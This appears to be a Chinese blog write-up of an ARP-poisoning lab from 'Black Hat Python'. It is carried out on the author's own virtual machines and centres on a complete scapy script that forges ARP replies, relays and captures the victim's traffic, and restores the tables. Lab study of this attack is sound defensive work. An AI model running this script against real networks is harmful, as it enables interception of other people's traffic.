近期收到了電子工業出版社贈送的一本網絡安全書籍《python黑帽子》,書中一共24個實驗,今天複現第9個實驗(arp投毒),我的測試環境是mbp電腦+kali虛擬機+centos虛擬機+conda開發環境。涉及到受害者 centos、攻擊者 kali、觀察者 mbp、網關,攻擊者作為網關和受害者之間的中間人,既要欺騙受害者,說自己是網關,又要欺騙網關,說自己是受害者~
ailx10
1、檢查我們原始的網關、受害者資訊、攻擊者資訊、觀察者資訊
- 受害者 centos :192.168.0.105 (8:0:27:f9:f4:e)
- 攻擊者 kali :192.168.0.103 (8:0:27:e7:67:1c)
- 觀察者 mbp :192.168.0.101 (18:65:90:cb:f0:5d)
- 網關:192.168.0.1 (94:d9:b3:66:ef:5c)
2、在受害者centos 上先看一下,和觀察者mbp 一樣
3、在攻擊者kali 上開啟IP轉發
echo 1 > /proc/sys/net/ipv4/ip_forward  # step 3: enable kernel IP forwarding on the attacker so it relays the victim<->gateway traffic it receives as the man-in-the-middle; this /proc write does not persist across a reboot
4、在攻擊者kali 上運作腳本
欺騙受害者,說網關192.168.0.1的MAC位址在08:00:27:e7:67:1c(實際上這個MAC位址是攻擊者kali)
ip src:192.168.0.1
ip dst:192.168.0.105
mac dst:08:00:27:f9:f4:0e
mac src:08:00:27:e7:67:1c
ARP is at 08:00:27:e7:67:1c says 192.168.0.1
欺騙網關,說受害者192.168.0.105的MAC位址在08:00:27:e7:67:1c(實際上這個MAC位址是攻擊者kali)
ip src:192.168.0.105
ip dst:192.168.0.1
mac dst:94:d9:b3:66:ef:5c
mac src:08:00:27:e7:67:1c
ARP is at 08:00:27:e7:67:1c says 192.168.0.105
5、在受害者上檢視ARP表
ARP表中的網關MAC位址,已經變成了攻擊者kali 的MAC位址了。看到這,就算實驗成功了~
參考代碼:
# -*- coding: utf-8 -*-
# @Time : 2022/6/6 10:39 PM
# @Author : ailx10
# @File : arper.py
from multiprocessing import Process
from scapy.all import sniff,conf,get_if_addr,send,sndrcv,srp,wrpcap
from scapy.layers.inet import Ether
from scapy.layers.l2 import ARP
import os
import sys
import time
def get_mac(targetip: str):
    """Return the MAC that answers an ARP who-has for *targetip*, or None.

    The request is broadcast on scapy's current ``conf.iface`` with a 2 s
    timeout and up to 10 retries; the Ethernet source address of the first
    reply is returned.  None means nobody answered.
    """
    request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op="who-has", pdst=targetip)
    answered, _unanswered = srp(request, timeout=2, retry=10, verbose=False)
    if not answered:
        return None
    _sent, reply = answered[0]
    return reply[Ether].src
class Arper:
    """Drive the three phases of the ARP-cache poisoning lab.

    ``poison`` sends forged ARP "is-at" replies in a loop, ``sniff`` captures the
    victim's traffic to ``arper.pcap``, and ``restore`` re-announces the genuine
    MAC addresses.  ``run`` launches the first two in separate processes.
    Unsolicited is-at replies of this kind are what ARP-monitoring defences
    (switch Dynamic ARP Inspection, arpwatch-style cache monitors) are built to
    flag, so the lab doubles as a fixture for exercising such detection.
    """

    def __init__(self, victim: str, gateway: str, interface: str = "en0") -> None:
        """Resolve both MACs and point scapy at *interface*.

        Args:
            victim: IPv4 address of the host whose ARP cache is poisoned.
            gateway: IPv4 address of the gateway whose cache is poisoned.
            interface: Interface scapy sends and sniffs on (``en0`` is a macOS
                default; the write-up passes the Kali interface on the command line).
        """
        self.victim = victim
        # NOTE(review): both get_mac() calls run before conf.iface is set below,
        # so the who-has lookups go out on scapy's current default interface —
        # confirm that matches *interface* on a multi-homed host.
        self.victimmac = get_mac(victim)
        self.gateway = gateway
        self.gatewaymac = get_mac(gateway)
        self.interface = interface
        conf.iface = interface
        conf.verb = 0  # silence scapy's per-packet send/receive output
        conf.use_pcap = True  # use the libpcap backend for send/capture
        # get_mac() returns None when nothing answers, and poison() copies these
        # values straight into hwdst — check the printed MACs before trusting a run.
        print(f"Initialized {interface}:")
        print(f"Gateway ({gateway}) is at {self.gatewaymac}")
        print(f"Victim ({victim}) is at {self.victimmac}")
        print("-"*30)

    def run(self) -> None:
        """Start poison() and sniff() as child processes and return immediately.

        poison_thread is assigned before sniff_thread starts, so sniff() finds it
        on its own copy of self (presumably via fork-style inheritance — TODO
        confirm on platforms whose default start method is spawn).
        """
        self.poison_thread = Process(target=self.poison)
        self.poison_thread.start()
        self.sniff_thread = Process(target=self.sniff)
        self.sniff_thread.start()

    def poison(self) -> None:
        """Send the two forged is-at replies once a second until interrupted.

        Runs in its own process (see run()).  Each round tells the victim that
        the gateway IP is at the sender's MAC and tells the gateway that the
        victim IP is at the sender's MAC.  Both replies are printed once before
        the loop so the lab output can be compared against a capture.
        """
        # Reply aimed at the victim: source IP = gateway, destination IP/MAC =
        # victim.  hwsrc is not set explicitly; the write-up's sample output
        # shows it filled with the sending (attacker) host's own MAC.
        poison_victim = ARP()
        poison_victim.op = 2  # 2 = is-at (reply), sent unsolicited
        poison_victim.psrc = self.gateway
        poison_victim.pdst = self.victim
        poison_victim.hwdst = self.victimmac
        print(f"ip src:{poison_victim.psrc}")
        print(f"ip dst:{poison_victim.pdst}")
        print(f"mac dst:{poison_victim.hwdst}")
        print(f"mac src:{poison_victim.hwsrc}")
        print(poison_victim.summary())
        print("-"*30)
        # Reply aimed at the gateway: source IP = victim, destination IP/MAC =
        # gateway.  hwsrc again left to scapy's default.
        poison_gateway = ARP()
        poison_gateway.op = 2
        poison_gateway.psrc = self.victim
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gatewaymac
        print(f"ip src:{poison_gateway.psrc}")
        print(f"ip dst:{poison_gateway.pdst}")
        print(f"mac dst:{poison_gateway.hwdst}")
        print(f"mac src:{poison_gateway.hwsrc}")
        print(poison_gateway.summary())
        print("-"*30)
        print(f"Beginning the ARP poison.[CTRL-C to stop]")
        while True:
            sys.stdout.write(".")
            sys.stdout.flush()
            try:
                send(poison_victim)
                send(poison_gateway)
            except KeyboardInterrupt:
                # NOTE(review): only an interrupt raised inside the two send()
                # calls reaches this handler; one arriving during the 1 s sleep
                # below propagates out without calling restore(), leaving the
                # forged entries in place.  Widening the try to cover the whole
                # loop body would close that gap.
                self.restore()
                sys.exit()
            else:
                time.sleep(1)

    def sniff(self, count: int = 50) -> None:
        """Capture *count* packets involving the victim, save them, then clean up.

        Runs in its own process (see run()).  Sleeps 5 s first so the poison
        loop has had a few rounds before capturing.  Writes the capture to
        arper.pcap in the current directory, re-announces the real MACs and
        terminates the poison process.

        Args:
            count: number of packets to capture before stopping.
        """
        time.sleep(5)
        print(f"Sniffing {count} packets")
        bpf_filter = "ip host %s"%self.victim  # IPv4 to or from the victim
        packets = sniff(count=count,filter=bpf_filter,iface=self.interface)
        wrpcap("arper.pcap",packets)
        print("Got the packets")
        # NOTE(review): restore() runs while the poison loop is still sending,
        # so a forged pair sent before terminate() lands can undo the restore.
        # Terminating (and joining) first, then restoring, avoids that window.
        # terminate() delivers SIGTERM, so poison()'s KeyboardInterrupt branch
        # and its own restore() call do not run on this path.
        self.restore()
        self.poison_thread.terminate()
        print("Finished.")

    def restore(self) -> None:
        """Re-announce the genuine gateway and victim MAC addresses.

        Each correct mapping is sent 15 times as an is-at reply whose hardware
        destination is the broadcast address, so the replies presumably reach
        every host on the segment rather than only the two targets — verify
        with a capture.  Also called by poison() on Ctrl-C.
        """
        print("Restoring ARP tables...")
        send(ARP(op=2,psrc=self.gateway,hwsrc=self.gatewaymac,pdst=self.victim,hwdst="ff:ff:ff:ff:ff:ff"),count=15)
        send(ARP(op=2,psrc=self.victim,hwsrc=self.victimmac,pdst=self.gateway,hwdst="ff:ff:ff:ff:ff:ff"),count=15)
if __name__ == "__main__":
    # Usage: arper.py <victim_ip> <gateway_ip> <interface> — three positional
    # arguments, all required; a missing one raises IndexError here.
    victim, gateway, interface = sys.argv[1], sys.argv[2], sys.argv[3]
    myarp = Arper(victim=victim, gateway=gateway, interface=interface)
    myarp.run()
釋出于 2022-06-07 06:51